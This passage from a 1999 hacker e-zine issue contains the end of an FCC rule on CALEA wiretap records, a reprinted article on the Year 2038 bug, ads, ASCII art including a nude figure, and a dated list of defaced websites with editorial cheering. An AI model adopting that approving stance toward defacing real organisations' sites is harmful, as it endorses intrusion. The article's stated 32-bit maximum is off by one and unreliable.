Carriers will be used to determine whether or not the telecommunications carriers are in conformance with CALEA's requirements, and the information maintained by telecommunications carriers will be used by law enforcement officials to determine the accountability and accuracy of telecommunications carriers' compliance with lawful electronic surveillance orders. List of Subjects in 47 CFR Part 64 Communications common carriers, Reporting and recordkeeping requirements. Federal Communications Commission. Magalie Roman Salas, Secretary. Rule Changes For the resaons discussed in the preamble, the Federal Communications Commission amends 47 CFR Part 64 as follows: PART 64--MISCELLANEOUS RULES RELATING TO COMMON CARRIERS 1. The authority citation for Part 64 is revised to read as follows: Authority: 47 U.S.C. 151, 154, 201, 202, 205, 218-220, and 332 unless otherwise noted. Interpret or apply Secs. 201, 218, 225, 226, 227, 229, 332, 48 Stat. 1070, as amended. 47 U.S.C. 201-204, 218, 225, 226, 227, 229, 332, 501 and 503 unless otherwise noted. 2. Part 64 is amended to add Subpart V to read as follows: Subpart V--Telecommunications Carrier Systems Security and Integrity Pursuant to the Communications Assistance for Law Enforcement Act (CALEA) Sec. 64.2100 Purpose. 64.2101 Scope. 64.2102 Definitions. 64.2103 Policies and procedures for employee supervision and control. 64.2104 Maintaining secure and accurate records. 64.2105 Submission of policies and procedures and commission review. 64.2106 Penalties. Sec. 64.2100 Purpose. Pursuant to the Communications Assistance for Law Enforcement Act, Public Law 103-414, 108 Stat. 4279 (1994) (codified as amended in sections of 18 U.S.C. and 47 U.S.C.), this subpart contains rules that require a telecommunications carrier to ensure that any interception of communications or access to call-identifying information effected within its switching premises can be activated only in accordance with appropriate legal authorization, appropriate carrier authorization, and with the affirmative intervention of an individual officer or employee of the carrier acting in accordance with regulations prescribed by the Commission. Sec. 64.2101 Scope. The definitions included in this subchapter shall be used solely for the purpose of implementing CALEA requirements. Sec. 64.2102 Definitions. (a) Appropriate legal authorization. The term appropriate legal authorization means: (1) A court order signed by a judge or magistrate authorizing or approving interception of wire or electronic communications; or (2) Other authorization, pursuant to 18 U.S.C. 2518(7), or any other relevant federal or state statute. (b) Appropriate carrier authorization. The term appropriate carrier authorization means the policies and procedures adopted by telecommunications carriers to supervise and control officers and employees authorized to assist law enforcement in conducting any interception of communications or access to call-identifying information. (c) Appropriate authorization. The term appropriate authorization means both appropriate legal authorization and appropriate carrier authorization. [[Page 51470]] Sec. 64.2103 Policies and procedures for employee supervision and control. A telecommunications carrier shall: (a) Establish policies and procedures to ensure the supervision and control of its officers and employees; (b) Appoint a senior officer or employee as a point of contact responsible for affirmatively intervening to ensure that interception of communications or access to call-identifying information can be activated only in accordance with appropriate legal authorization, and include, in its policies and procedures, a description of the job function of the appointed point of contact for law enforcement to reach on a seven days a week, 24 hours a day basis; (c) Incorporate, in its polices and procedures, an interpretation of the phrase appropriate authorization that encompasses the definitions of appropriate legal authorization and appropriate carrier authorization, as stated above; (d) State, in its policies and procedures, that carrier personnel must receive appropriate legal authorization and appropriate carrier authorization before enabling law enforcement officials and carrier personnel to implement the interception of communications or access to call-identifying information; (e) Report to the affected law enforcement agencies, within a reasonable time upon discovery: (1) Any act of compromise of a lawful interception of communications or access to call-identifying information to unauthorized persons or entities; and (2) Any act of unlawful electronic surveillance that occurred on its premises. (f) Include, in its policies and procedures, a detailed description of how long it will maintain its records of the content of an interception. Sec. 64.2104 Maintaining secure and accurate records. (a) A telecommunications carrier shall maintain a secure and accurate record of each interception of communications or access to call-identifying information, made with or without appropriate authorization, in the form of single certification. (1) This certification must include, at a minimum, the following information: (i) The telephone number(s) and/or circuit identification numbers involved; (ii) The start date and time of the opening of the circuit for law enforcement; (iii) The identity of the law enforcement officer presenting the authorization; (iv) The name of the person signing the appropriate legal authorization; (v) The type of interception of communications or access to call- identifying information (e.g., pen register, trap and trace, Title III, FISA); and (vi) The name of the telecommunications carriers' personnel who is responsible for overseeing the interception of communication or access to call-identifying information and who is acting in accordance with the carriers' policies established under Sec. 64.2103. (2) This certification must be signed by the individual who is responsible for overseeing the interception of communications or access to call-identifying information and who is acting in accordance with the telecommunications carrier's policies established under Sec. 64.2103. This individual will, by his/her signature, certify that the record is complete and accurate. (3) This certification must be compiled either contemporaneously with, or within a reasonable period of time after the initiation of the interception of the communications or access to call-identifying information. (4) A telecommunications carrier may satisfy the obligations of paragraph (a) of this section by requiring the individual who is responsible for overseeing the interception of communication or access to call-identifying information and who is acting in accordance with the carriers' policies established under Sec. 64.2103 to sign the certification and append the appropriate legal authorization and any extensions that have been granted. This form of certification must at a minimum include all of the information listed in paragraph (a) of this section. (b) A telecommunications carrier shall maintain secure and accurate records of: (1) Call-identifying information and unauthorized interceptions (including the content of the unauthorized interception) for ten years; (2) The content of each authorized interception of communications for a reasonable period of time as determined by the carrier. (c) It is the telecommunications carrier's responsibility to ensure its records are complete and accurate. (d) Violation of this rule is subject to the penalties of Sec. 64.2106. Sec. 64.2105 Submission of policies and procedures and commission review. (a) Each telecommunications carrier shall file with the Commission the policies and procedures it uses to comply with the requirements of this subchapter. These policies and procedures shall be filed with the Federal Communications Commission within 90 days of the effective date of these rules, and thereafter, within 90 days of a carrier's merger or divestiture or a carrier's amendment of its existing policies and procedures. (b) The Commission shall review each telecommunications carrier's policies and procedures to determine whether they comply with the requirements of Sec. 64.2103 and Sec. 64.2104. (1) If, upon review, the Commission determines that a telecommunications carrier's policies and procedures do not comply with the requirements established under Sec. 64.2103 and Sec. 64.2104, the telecommunications carrier shall modify its policies and procedures in accordance with an order released by the Commission. (2) The Commission shall review and order modification of a telecommunications carrier's policies and procedures as may be necessary to insure compliance by telecommunications carriers with the requirements of the regulations prescribed under Sec. 64.2103 and Sec. 64.2104. Sec. 64.2106 Penalties. In the event of a telecommunications carrier's violation of Sec. 64.2103 or Sec. 64.2104 of this subchapter, the Commission shall enforce the penalties articulated in 47 U.S.C. 503(b) of the Communications Act of 1934 and 47 CFR 1.8. [FR Doc. 99-24853 Filed 9-22-99; 8:45 am] BILLING CODE 6712-01-P @HWA 85.0 Year 2000? How About 2038? ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by no0ne Everyone's been talking and dealing with the Y2K problem. On the sidelines awaits a new, probably easier to handle, computer date problem. The Year 2038 Bug can cause problems for computer applications written in C Language when the date hits January 18-19, 2038. This is in relation to "time.h", C's standard time library routine, which uses a 4-byte format to store time values and other functions to manipulate them. Times Computing http://www.timescomputing.com/19990922/nws2.html September 22, 1999 Get ready for the year 2038 bug Ganesh Ramamoorthy You've heard about the year 2000 (Y2K) problem--everyone, everywhere talks about it these days. You've heard people making doomsday predictions that there is no escape from it, and that the whole world economy could come crumbling down. You are concerned, like everyone else, and are hoping that the bug is fixed soon. But just as companies world over are toiling to address all Y2K related issues, and trying to put an end to all date-related problems, a new date bug is all set to surface, though not expected to be quite as troublesome as the Year 2000 bug. Welcome to the Year 2038 problem--wherein some computer applications could start malfunctioning when the date rolls over from January 18, 2038 to January 19, 2038. Intrigued? Here is how it happens: The Year 2038 problem is expected to affect programs written in the C language. C programs use a library of small little programs known as routines. The Year 2038 problem arises because of the standard time library routine called "time.h". This library uses a 4-byte format to store time values and a number of other functions to manipulate and display them. Now, the 4-byte format assumes a value of 0 (zero) for the time beginning at 12:00:00 AM on January 1, 1970. All time and date values are expressed as the number of seconds following this zero value. So the value 938060318 is 938,060,318 seconds past 12:00:00 AM on January 1, 1970, which is 16:18:38 on Wednesday, September 22, 1999. The advantage of this format is that the time difference, in seconds, between any two time values can be obtained by simply subtracting one from the other. You can then use functions in the library to manipulate and determine the number of minutes, hours, days, months, or years that have passed between the two time values. But the problem in this format arises because of the way in which the "bits" and "bytes" work. A 4-byte integer remains positive until a maximum value of 2,147,483,648 is reached, and this is where the Year 2038 problem arises. The maximum value of time before it rolls over to a negative--and therefore invalid--value is 2,147,483,648. On this date any C program that uses the standard time library will begin to experience problems with date calculations. But there's no cause for panic--it's just another date issue to be addressed. Fortu-nately, this problem is relatively easier to tackle and fix than the Year 2000 problem. All that is required is a new version of the library that uses more bytes for storing the values i.e. an 8-byte value or a 16-byte value. Affected programs can then be simply recompiled with the new version of the library. Fixing the year 2038 problem should not be as time-consuming or cost-intensive, assuming companies update that particular standard time library with the new version--possibly even as they are fixing current Year 2000 problem. Many would say that the Year 2038 is still a long way off--but then, haven't we heard that one before.... @HWA -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre <a href="http://www.2600.com/">www.2600.com</a> <a href="http://www.kevinmitnick.com></a> +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * <a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous...<sic> ____ _ _ _ _ _ / ___| ___ _ __ __| (_)_ __ _ _ ___ _ _ _ __ / \ ___ ___(_|_) \___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | | ___) | __/ | | | (_| | | | | | |_| | (_) | |_| | | / ___ \\__ \ (__| | | |____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_| /_/ \_\___/\___|_|_| |___/ / \ _ __| |_ / _ \ | '__| __| / ___ \| | | |_ /_/ \_\_| \__| TOO, for inclusion in future issues Do the HWA logo etc and we'll showcase it here to show off your talents...remember the 80's? dig out those ascii editors and do yer best... _| _|_|_| _|_| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_| _|_| _| _|_| _| _|_| _| _|_| _|_| _|_| _|_|_|_| _| _|_| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _|_| _|_| _|_| _| I know some of you print this out onto hardcopy (poor bastards :) so here's a treat for you, the classic Angela ascii nude... ANGELA Author: Unkown, Someone at MIT probably. . ... .""." . ". . "" '.".:I:.".. ". .".:.:....:II:".".".. ". .":."::.:::.:II:".".".".. ". ."."."."::.:.:.:I:".".".". . . ..".".".:.:I::.:II:."..".".. . .."."":.:.::.:.::II::.".".".".. . ..".".".:.::. .:::II:..".".".".". . .":."".":".".".:.:I:".".".".".. ".. .. ":. ".":". ..:.::.::.:.".." ":.".".. .. .:.:.":". ".:":I:.:.. .".". ": .".. . .. "..:.:". .:.II:.:.. . .:.". ".. ". . .. .. :.:.". .:.:I:.:. . . ..:..:. :..":. . ". .:. :.:. .:.:I:.:. . . ..:I::. :: :: .. .. .. :".".:. .:.:I:". ..:.:I:. :: ::. . ". "..:. .:.. .:II:" ..:IIIH. ::. ":. . .:.::".:::..:.AII:. .::',, :I .::. ":. . :..:".:II:.:I: ,,:" " .::FBT'X:: ..:.. ":. . . .. :":III:. :.:A'FBF:. . .P.IP::':: :I:.."::. . .. . .:.:II: A.".":.PP:' . . ..".." .: :.::. ":... . .. . .: .:IIIH:. " "." . ... . .:. :.:.. :... ." . .I.::I:IIA. .. ... ..::.".".".: .. . . .:II.".":IA:. .. ..:. . .:.: .""." .. . . ..::I:."."::A:. . .:"-. .-.:.. .:.::AA.. ..:." .. . ":II:I:. ":A:. ..:" "".. . : ..:::AHI: ..:..".". .":III.::. "II:.:.,.::::::::'. .:::AHV:: .::"" .. ..':IIHI::. . 'I:..'::,,,,::'. . .:AII:: :.:" . . . . IIHHI:..".."V::. '::::' ...:AIIV:".:." .. . . . :IIHI:. .:.:.V:. " " . ...:HI:" .:: :. . .. . . ":IHII:: ::.IA.. .. .A .,,:::" .:. . :. ..."I:I:.: .,AHHA, . ."..AHIV::" . . : .. :. ".::::II:.I:.HIHHIHHHHHIHHIHV:"..:. .I.":. .. ". . . .. "":::I:".::IHHHHHHHHHHHHIHI. ".".:IHI.. " " ". ":... . ""' .::".HHHI:HHHHHHHIHI. :IIHHII:. . . . . :.:.. . ..::." .IV'.:I:IIIHIHHIH. .:IHI::".": ".. . . . .:.:: .. ::"."."..":.::I:I:IHHHIA.".II.:...:" ." ... . ".. "..::::" ...::".IIHII:: .:.:..:..:III:."::" ." . .. . . "::.:" ."" .. :IIHI:.:.. ..: . .:I:'" ...:.:. .. .. .. .:..::I:. . . . .IHII:.:" .. ..'.::.:II:.:. . ... . .. .. . .::.:.,,...-::II:.:" . ...... . .. .:II:.:: ... .. .. ..:.::.I . . . .. .:. .... ..,:.. . . ..:.::. :.. . .. .".::I:. . .. ..:.... . ..... .. . ..::. .. .I:. .." . ."":.: I. . .. ..:.. . . .. ..... .:. .:.. .:I."."".. . .:::I:. . . .. .:. . .. .. . ... .:."."I" . ... . ::.:I:.. . . . ....:. . . .... .. .:...:.:.:. ""."" "."::"I:. . .. ....:. . .. . .. .." .".:..:.. " :. . . .. .. .:.... . . .... ... . .:.:.:.. ". :. . . . .. .:.... . . ........ .:.:.::. . . :. . . . . . .. .::..: . ..:.. . ::.:.:.. . . :.. . . . . . .. ..:.: .. .. .:. .. ":::.::.:. . . ":.. . . . . .. .. ...::" .. .. . .:. . V:I:::::.. . :. "::. . . .. .. ... .:.:: .. . . .. .. . VI:I:::::.. ""B :.. . . .. ..:.. ..I:... . . . .. ... . VII:I:I:::. .":: ":.. . . . .. ..:..:.:I:.:. . . .. . .:. . VHIII:I::.:..": ::.. . . .. ..:..:.HI:. . . . .... . :HHIHIII:I::..: ":. . . .. .. ..:.:.:HI:. . . .. ..... . HHHHIHII:I::." :.. . . . .. .:.:.:.HI:. . . .. ... . IHHHHIHHIHI:" :.. . . . .. ..:..IH:. . . .. .. ... . "HHHHHHHHI:" ":.. . . .. ..:.:.:HI.. . . .. . :::::. IH:'''" :. . . . .. ..::.:.VI:. . . .. .:::"::. HIH :.. . . .. .:.:.:.V:. . . . ...::I'A:. HHV :. . . . .. ..:.:.V:. . . ....::I::".HV: :. . . . . .. .:..II:. . . . ....":::" AV." :.. . . .. ... .:..VI:. . . .. .:. ..:.AV". ":.. . . .. ..:.:.:HAI:.:...:.:.:.:.AII:. I:. . .. ... .:.:.VHHII:..:.:..:A:".:.. IA.. . . .. ..:.:.:VHHHHIHIHHIHI:".::. "HA:. . . .. ..:.:.:HHHIHIHHHIHI:..:. HIA: . . . .. ...:.VHHHIHIIHI::.:... HIHI:. . .. ... .::.HHHIIHIIHI:::.. HII:.:. . .. ... .::VHHIHI:I::.:.. AI:..:.. . . .. ..:.VHIII:I::.:. . AI:. ..:.. . . .. .." VHIII:I:... . AI:. . .:.. . . . ... VHIII::... . .A:. . :.. . . .. .:.. VHII::.. . A:. . . ::. .. .. . .:.. 'VHI::.. . .:.. . . :.. .:..... .::.. VHI:.. ... . . . . . :.:. ..:. . .::.. VI:.. . .. .. . . . . ...:... . .. . .:::. V:.. . ".. .. . . .. ..:::.... .:. . ..::.. V.. . . . .. . . . . .. ..:::A. ..:. . . .::.. :.. . .. .. .. . . . ... ..::IA.. .. . . ..::. :.. . .. .. ... . . .. .... .:.::IA. . .. . ..:.::. :. . . . . .. . . . .. ..:..:.::IIA. . . .. .:.::. :. . .. . . . . . .. ... ..:.::I:IHA. . . . ..:.::. . . .: .. . . . . ... .:.. .:I:IIHHA. . . .. .::I:. . .::. . . . .. ..:. .::.:IIHIIHHHA. . .. ..:I:. . . A::.. . . ...:..:.::I:IHIHIHHHHA. . . ..::I:. . :HI:.. . . .. .:.:.::I:IHIHIIHIHHHA. . .. .::I:. .. AI:.. .. . . .. .:.:.::II:IHIIIHIHIHHHA. . . ..::I:. .. :HI:.. . . . . .. .::.:I:IHIHIIIHIHIIHHHA.. . .. .::I:. .. AI:.:.. . . . ... .::.::I:IHIIHIHIHIHIHIHHA. . . ..::I:. . HI:. .. . . . . .. .:..::IIHIHIHIIIIVHIIHHHVA. . . .:::I:. . . HI:.. . . . . .. ..:.::I:IIHHIIHIHIHIHHHHV' ".. . ..:::II: . . HI::.. . . . .. .:..:::IIHIHIIVIVIIVHVV' . .. . ..::III: . . HI::... . . . . ... ..:.:::IIHIVIVIVHVHVV. . . . .. .:.:III. . . II::.:.. . . . .. ......:..IHVHIVVHVHV'.. . . . . "... .:.:IHI:.. . II:I::.. . . . . .....::.:IHVHVVVHV:.. . . . . .:..:::IIHII.. :II:.:.:.. . . . ......:.:.:IVVHVVV:.:.. . . . . :...:.:IHHI:.. HI::.:. . . . . . ...:.::.::.VVHVV::.:.:.. . . .. . :.. ..:IHHI::."' HII::.:.. . . . .. .:..:.". "VVVI::.::.:.. . . . .. ":...:II:IIII:: III::.:... . . . ...:.:... . VII:I::.:.. . . .. . . :.:::...::.:: VII::.:.. . . . .. ...:.... VHI:I::.:.. . . ... .. .::.:..:.:..: VII::.:.. . . ..:.::.. . :HHII:I::.:.. . . .. .. ."::":...... III:I::.. .. . . .. .:.:.. . :VHIHI:I::.:... . . .. .. .":. .. .AH III:I::.. . . . .. ..:.. . . ::HHIHII:I::.:... .. .. ... .:.::AHHH @HWA SITE.1 #1 http://www.smog.cjb.net Smogzer has revamped his Smog Alert site, it now has a much nicer interface and look, plus the usual news and e-books and how-to's, plus the featured how-to on removing banners from FWP's which is included in this issue and can also be found on PSS. Check it out. #2 http://packetstorm.securify.com Well it had to be this site didn't it? They're back online (see elsewhere in the mag for more info). Nice layout, No Ken. Can't have everything I suppose but at least all that cool data wasn't lost. Many of the September exploits featured in this issue are from PSS. You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. [99.09.23] NT [ ] Celiba Web (www.celibaweb.com) [99.09.23] Ir [ ] Baga (UK) (www.baga.co.uk) [99.09.23] Li [LevelSeven] Ranger Power (www.rangerpower.com) [99.09.22] [ytcracker] Movin Melvin (www.movinmelvin.com) [99.09.22] Li [DeLLeTe] New Horizons Funding (www.newhorizonsfunding.com) [99.09.22] NT [bl0w team] Rogers University (www.rogersu.edu) [99.09.22] So [Epoc_] SF Giants (www.sfgiants.com) [99.09.22] Ir [DeLLeTe] Solana Ranch (www.solanaranch.com) [99.09.22] NT [DeLLeTe] Update Wizard (www.updatewizard.com) [99.09.22] Bf [DeLLeTe] West End Media (www.westendmedia.com) [99.09.22] NT [DeLLeTe] World City Info (www.worldcityinfo.com) [99.09.22] Li [Epoc_] ZeroKool (www.zerokool.org) [99.09.22] NT [bl0w team] Massachusetts College of Pharmacy (www.mcp.edu) [99.09.22] NT [139_r00ted] Hoffman Bikes (www.hoffmanbikes.com) [99.09.22] NT [DeLLeTe] Get Computer Smart (www.getcomputersmart.com) [99.09.22] NT [139_r00ted] Electronic Data Systems (www.eds-ms.com) [99.09.22] So [DeLLeTe] Dr. David Martin (www.dmartin.com) [99.09.22] Ir [DeLLeTe] Creek and Timber (www.creekandtimber.com) [99.09.22] NT [ytcracker] Airspace USA (airspaceusa.com) [99.09.22] Li [ ] Value Com (valuecom.com) [99.09.22] Bf [Jewkid] Deadlist (www.deadlist.com) [99.09.23] Li [ ] Galt Sux (www.galtsux.com) [99.09.23] So [mistuh clean] Internet Image (www.internetimage.com) [99.09.23] NT [HIT2000] Celiba Web (www.celibaweb.com) [99.09.23] Ir [RoA] Baga (UK) (www.baga.co.uk) [99.09.23] Li [LevelSeven] Ranger Power (www.rangerpower.com) [99.09.20] Li [LevelSeven] Frohling Family Org. (frohling.org) [99.09.20] NT [bl0w team] Central Connecticut State Univ. (www.ccsu.edu) [99.09.20] Li [DeLLeTe] Front Stage (www.frontstage.com) [99.09.20] Li [Buff3] Bird (www.odd.org) [99.09.20] BI [DeLLeTe] RC2 (www.rc2.com) [99.09.20] NT [HIT2000] Euro Micron (www.euromicron.com) [99.09.20] Bf [ ] C g0ddess nude models (www.g0ddess.com) [99.09.20] So [z0mba] Keansburg High School (titans.khs.keansburg.k12.nj.us) [99.09.20] NT [bl0w team] Adrian College (www.adrian.edu) [99.09.20] NT [ytcrcker/s0n] Empire Honda (www.empirehonda.com) [9/21/99] defaced: www.rootfest.org by: citadel mirror:http://www.attrition.org/mirror/attrition/1999/09/21/www.rootfest.org/ (According to lothos in #legions, this was a DNS hack and not a server hack.) [9/20/99] Defaced: http://www.g0ddess.com/ By: Unknown Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.g0ddess.com OS: FreeBSD Note: The defacement consists of a comment within the HTML of the mirror. [9/20/99] defaced: www.el8.net By: ? mirror: http://www.attrition.org/mirror/attrition/1999/09/21/www.el8.net/ (yes, the defacers used file:///c:/ img src tags, so the images are broken. bright.) [9/20/99] Defaced: http://www.euromicron.com/ By: HIT2000 Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.euromicron.com OS: NT [9/20/99] Defaced: http://titans.khs.keansburg.k12.nj.us/ By: z0mba Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/titans.khs.keansburg.k12.nj.us OS: Solaris [9/20/99] Defaced: http://www.empirehonda.com/ By: ytcr�cker/s0n Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.empirehonda.com OS: NT [9/20/99] Defaced: http://www.adrian.edu/ By: bl0w team Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.adrian.edu OS: NT [9/19/99] Defaced: http://www.iqsnet.it/ By: Teddy Ruxpin Enthusiasts Against Tyranny Mirror: http://www.attrition.org/mirror/attrition/1999/09/19/www.iqsnet.it/ OS: Solaris [9/19/99] Defaced: http://www.bou.or.ug/ (Bank of Uganda) By: 139_R00ted Mirror: http://www.attrition.org/mirror/attrition/1999/09/19/www.bou.or.ug OS: NT [9/19/99] Defaced: http://www.naacp.org By: United Loan Gunmen Mirror: http://www.attrition.org/mirror/attrition/1999/09/19/www.naacp.org/ OS: NT Note: This is the same group that has defaced ABC Network, C-SPAN, The Drudge Report, and the NASDAQ [9/18/99] Defaced: http://www.pietersburg.org.za/ By: 139 Rooted Mirror: http://www.attrition.org/mirror/attrition/1999/09/18/www.pietersburg.org.za OS: Windows NT [9/18/99] Defaced: http://www.rivazone.de/ By: HIT2000 Mirror: http://www.attrition.org/mirror/attrition/1999/09/18/www.rivazone.de OS: Linux [9/18/99] Defaced: http://www.wine-auction-prices.com By: Hackers in Paradise Mirror: http://www.attrition.org/mirror/attrition/1999/09/18/www.wine-auction-prices.com/ OS: BSD/OS Note: This is the same group that brought to our attention the flaw in Webcart e-commerce software. MindSec.com released an advisory on the software (http://www.mindsec.com/webcart) and Mountain Networks, makers of the software, responded ( http://www.mountain-net.com/security.htm ) Allegedly, this group has found other flaws in the software other than what is addressed by its creator. [9/18/99] Defaced: http://www.ucinet.com By: Team Defiance Mirror: http://www.attrition.org/mirror/attrition/1999/09/18/www.ucinet.com OS: Linux [9/17/99] Defaced: http://www.earl.org.uk/ By: vendetta Mirror: http://www.attrition.org/mirror/attrition/1999/09/17/www.earl.org.uk OS: Solaris [9/17/99] Defaced: http://www.lic.gov.uk/ By: vendetta Mirror: http://www.attrition.org/mirror/attrition/1999/09/17/www.lic.gov.uk OS: Solaris [9/17/99] Defaced: http://www.dorts.gov.tw/ By: Pakistan Hacker Club Mirror: http://www.attrition.org/mirror/attrition/1999/09/17/www.dorts.gov.tw OS: BSD/OS [9/17/99] Defaced: http://www.jobsite.co.uk/ By: vendetta Mirror: http://www.attrition.org/mirror/attrition/1999/09/17/www.jobsite.co.uk OS: Solaris [9/17/99] Defaced: http://www.lesoff.co.za/ By: 139 R00ted Mirror: http://www.attrition.org/mirror/attrition/1999/09/17/www.lesoff.co.za OS: NT [9/17/99] Defaced: http://www.cloudgate.org.tw/ By: ALOC Mirror: http://www.attrition.org/mirror/attrition/1999/09/17/www.cloudgate.org.tw OS: Linux [9/17/99] Mass Defacement By: L0rdMyst1cal Mirror: http://www.attrition.org/mirror/attrition/1999/09/17/www.herreramedia.com OS: NT Domains: www.tental.com www.herreramedia.com www.worldtek.net www.danwebb.com www.elixirs.com www.brownsweb.com www.jodo.com www.voyagergroup.net www.softwarepundits.com www.crowe.org www.mayhewandassoc.com www.cruisinco.com and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- � 1998, 1999 (c) 